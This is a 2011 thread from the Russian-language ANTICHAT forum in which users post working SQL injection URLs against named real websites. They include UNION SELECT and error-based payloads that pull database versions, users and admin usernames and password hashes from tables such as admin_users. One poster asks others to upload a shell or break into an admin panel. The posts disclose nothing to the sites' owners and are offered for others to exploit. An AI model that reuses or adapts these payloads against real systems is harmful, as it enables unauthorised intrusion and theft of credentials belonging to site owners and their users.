HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13671  
Старый 19.02.2011, 18:25
Komyak
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704

Репутация: 26
По умолчанию

Код:
Code:
http://gps.smartzone.ru/razdel.php?id_raz=-1+UNION+SELECT+1,user()--&param=list
phpbb3_users

client

smartzone_users
 
Ответить с цитированием

  #13672  
Старый 19.02.2011, 22:53
danielito
Guest
Сообщений: n/a
Провел на форуме:
4072

Репутация: -1
По умолчанию

http://indabattle.com/Malenkiy_Pavlik/?page=-255+union+select+1,2,3,table_name,5+from+informati on_schema.tables+limit+222,1--

админка /administrator

Сможет кто шелл залить? или в админку зайти

пассы вида md5:salt
 
Ответить с цитированием

  #13673  
Старый 21.02.2011, 11:17
Hack_ERR++
Новичок
Регистрация: 13.08.2009
Сообщений: 10
Провел на форуме:
179283

Репутация: 10
По умолчанию

Код:
Code:
http://autocatalog.bg/marka.php?id=-23+union+select+1,2,3,concat_ws(0x20,type,password),5,6+from+admin_users--
http://www.bigbay.bz/develdesc.php?id=-23+union+select+1,concat_ws%280x20,id,username,password%29,3,4,5,6,7,8,9,10,11,12,13+from+prop_admin--
 
Ответить с цитированием

  #13674  
Старый 21.02.2011, 17:22
barbara
Guest
Сообщений: n/a
Провел на форуме:
239

Репутация: 0
По умолчанию

Код:
Code:
http://kostroma.rfn.ru/rnews.html?id=46429+OR+1=1+ORDER+BY+11--
http://kostroma.rfn.ru/rnews.html?id=46429+OR+1=1+ORDER+BY+SYSDATE--
Подобные команды работают, что дает основания полагать, что субд - оракл, а таблица имеет 11 колонок. Если кто хорошо знаком с ораклом, можете поиграться. Или тут вряд ли можно что-то полезное раздобыть?
 
Ответить с цитированием

  #13675  
Старый 21.02.2011, 18:18
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.exploratorium.edu/imaging_station/gallery.php?Asset=Human%20red%20blood%20cells&Grou p=&Category=Blood%20Cells&Section=Introduction'+or +1+group+by+concat((select+user()),floor(rand(0)*2 ))+having+min(0)--+

user:imaging_station@www1.exploratorium.edu
 
Ответить с цитированием

  #13676  
Старый 21.02.2011, 19:18
Koren
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069

Репутация: 0
По умолчанию

smallville

http://smallville.fanwebsite.co.uk/music.php?smallville_episodeid=-67+union+select+1,version%28%29,3,4,5--
 
Ответить с цитированием

  #13677  
Старый 21.02.2011, 21:17
Slay90
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
Провел на форуме:
150009

Репутация: 14
По умолчанию

//система антибаян описана в первом посте
 
Ответить с цитированием

  #13678  
Старый 22.02.2011, 11:24
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

ничего личного

http://islamvolga.ru/veroucheniya.php?cat=-1%20and%201=2%20union%20select%201,concat_ws(char( 58),@@version,user(),database(),@@version_compile_ os),3,4,5,6,7--

5.1.47-rel11.2-log djklm38@localhost djklm38_forall unknown-linux-gnu

http://islamvolga.ru/veroucheniya.php?cat=-1%20and%201=2%20union%20select%201,concat_ws(char( 58),username,password,email),3,4,5,6,7%20from%20er z_users--
 
Ответить с цитированием

  #13679  
Старый 22.02.2011, 14:23
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

_http://k156.ru/2/1/catview.php?cat_id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5--

_http://monolit44.ru/catviewarm.php?catarm_id=-10+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user())--

_http://stroyvektor.com/foto.php?fot=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7--

_http://citadel-kostroma.ru/catviewflat.php?cat57_id2=-9+union+select+concat_ws(0x3a,version(),database() ,user())--

_http://www.newchemistry.ru/himprocesses.php?cat_id=-36+union+select+concat_ws(0x3a,version(),database( ),user())--

_http://www.marich.od.ua/board.php?cat_id=-2+union+select+concat_ws(0x3a,version(),database() ,user())--
 
Ответить с цитированием

  #13680  
Старый 22.02.2011, 18:18
danielito
Guest
Сообщений: n/a
Провел на форуме:
4072

Репутация: -1
По умолчанию

http://www.astrakhanfm.ru/news/news.php?id=99999+union+select+1,2,3,4,version(),6 ,7--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ